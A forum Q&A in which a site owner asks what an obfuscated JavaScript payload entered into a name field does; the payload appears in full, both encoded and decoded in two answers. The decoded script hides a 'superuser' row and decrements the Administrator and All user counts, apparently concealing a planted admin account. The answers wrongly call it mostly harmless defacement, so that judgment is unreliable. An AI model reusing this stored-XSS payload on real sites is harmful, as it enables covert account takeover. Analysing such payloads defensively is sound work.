# What does this suspicious and likely malicious code do?

Tags: javascript

A random user added this text as his name in a web form.  I suppose his idea was to somehow inject Javascript into a dynamic page.  How should this code be interpreted?  (What does it do?)

```
<script LANGUAGE="JavaScript">
function Decode() {
    var temp = "",
        i, c = 0,
        out = "";
    var str = "46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!62!32!118!97!114!32!115!101!116!85!115!101!114!78!97!109!101!32!61!32!102!117!110!99!116!105!111!110!40!41!123!32!116!114!121!123!32!118!97!114!32!116!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!41!59!32!119!104!105!108!101!40!116!46!110!111!100!101!78!97!109!101!33!61!34!84!82!34!41!123!32!116!61!116!46!112!97!114!101!110!116!78!111!100!101!59!32!125!59!32!116!46!112!97!114!101!110!116!78!111!100!101!46!114!101!109!111!118!101!67!104!105!108!100!40!116!41!59!32!118!97!114!32!116!97!103!115!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!72!51!34!41!59!32!118!97!114!32!115!32!61!32!34!32!115!104!111!119!110!32!98!101!108!111!119!34!59!32!102!111!114!32!40!118!97!114!32!105!32!61!32!48!59!32!105!32!60!32!116!97!103!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!32!118!97!114!32!116!61!116!97!103!115!91!105!93!46!105!110!110!101!114!72!84!77!76!59!32!118!97!114!32!104!61!116!97!103!115!91!105!93!59!32!105!102!40!116!46!105!110!100!101!120!79!102!40!115!41!62!48!41!123!32!115!32!61!40!112!97!114!115!101!73!110!116!40!116!41!45!49!41!43!115!59!32!104!46!114!101!109!111!118!101!67!104!105!108!100!40!104!46!102!105!114!115!116!67!104!105!108!100!41!59!32!116!32!61!32!100!111!99!117!109!101!110!116!46!99!114!101!97!116!101!84!101!120!116!78!111!100!101!40!115!41!59!32!104!46!97!112!112!101!110!100!67!104!105!108!100!40!116!41!59!32!125!32!125!32!118!97!114!32!97!114!114!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!117!108!34!41!59!32!102!111!114!40!118!97!114!32!105!32!105!110!32!97!114!114!41!32!105!102!40!97!114!114!91!105!93!46!99!108!97!115!115!78!97!109!101!61!61!34!115!117!98!115!117!98!115!117!98!34!41!123!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!125!32!125!99!97!116!99!104!40!101!41!123!125!59!32!125!59!32!97!100!100!76!111!97!100!69!118!101!110!116!40!115!101!116!85!115!101!114!78!97!109!101!41!59!32!60!47!115!99!114!105!112!116!62!";
    l = str.length;
    while (c <= str.length - 1) {
        while (str.charAt(c) != '!') temp = temp + str.charAt(c++);
        c++;
        out = out + String.fromCharCode(temp);
        temp = "";
    }
    document.write(out);
}
</script>

<script LANGUAGE="JavaScript">
Decode();
</SCRIPT>
```

Comment: https://beautifier.io/ *edit*, I guess it doesn't detect this one. You can just run part of the code and see what the value of `out` is.

Comment: When I run it, I get "...".  That's all.  Is that all it does?

Comment: No it creates a `<script>` tag. You should replace `document.write(out)` with `console.log(out)`.

Comment: Nothing seems to be malicious. Just some manipulation with DOM.

Comment: @JeremyGottfried: `document.write` is not in the loop and the loop is not endless.

Comment: [Little Bobby Tables, we call him.](https://xkcd.com/327/)

Comment: Opening this page actually made my antivirus go bezerk and quarantined Kryptik.BP!tr trojan.

Answer (score 1, accepted):

It injects this into the page...

As for what it *does*... well, nothing *really*
It replaces some tags on the page with some "Administrator" text... without seeing the rest of your code I can't really tell, but it looks like it is mainly defacing the site to scare you

```
... <b id="user_superuser">
<script language="JavaScript"> 
var setUserName = function() {
    try {
        var t = document.getElementById("user_superuser");
        while (t.nodeName != "TR") {
            t = t.parentNode;
        };
        t.parentNode.removeChild(t);
        var tags = document.getElementsByTagName("H3");
        var s = " shown below";
        for (var i = 0; i < tags.length; i++) {
            var t = tags[i].innerHTML;
            var h = tags[i];
            if (t.indexOf(s) > 0) {
                s = (parseInt(t) - 1) + s;
                h.removeChild(h.firstChild);
                t = document.createTextNode(s);
                h.appendChild(t);
            }
        }
        var arr = document.getElementsByTagName("ul");
        for (var i in arr)
            if (arr[i].className == "subsubsub") {
                var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
                var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
                var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
            }
    } catch (e) {};
};
addLoadEvent(setUserName);
</script>
```

Answer (score 2):

It creates a script tag with some JavaScript code. It changes some HTML elements, doesn't seem to be very dangerous. We would probably need to know what environment / website it was supposed to be used in.

Here is the code created by the script:

```
<b id="user_superuser"><script language="JavaScript">
var setUserName = function () {
  try {
    var t = document.getElementById("user_superuser");
    while (t.nodeName != "TR") {
      t = t.parentNode;
    };
    t.parentNode.removeChild(t);
    var tags = document.getElementsByTagName("H3");
    var s = " shown below";
    for (var i = 0; i < tags.length; i++) {
      var t = tags[i].innerHTML;
      var h = tags[i];
      if (t.indexOf(s) > 0) {
        s = (parseInt(t) - 1) + s;
        h.removeChild(h.firstChild);
        t = document.createTextNode(s);
        h.appendChild(t);
      }
    }
    var arr = document.getElementsByTagName("ul");
    for (var i in arr)
      if (arr[i].className == "subsubsub") {
        var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
        var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
        var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
      }
  } catch (e) {};
};
addLoadEvent(setUserName);
```

Comment: Please do not modify answers with edits that conflict with the author's intent. If you want to share how one could determine that this is the generated code, you should write your own answer.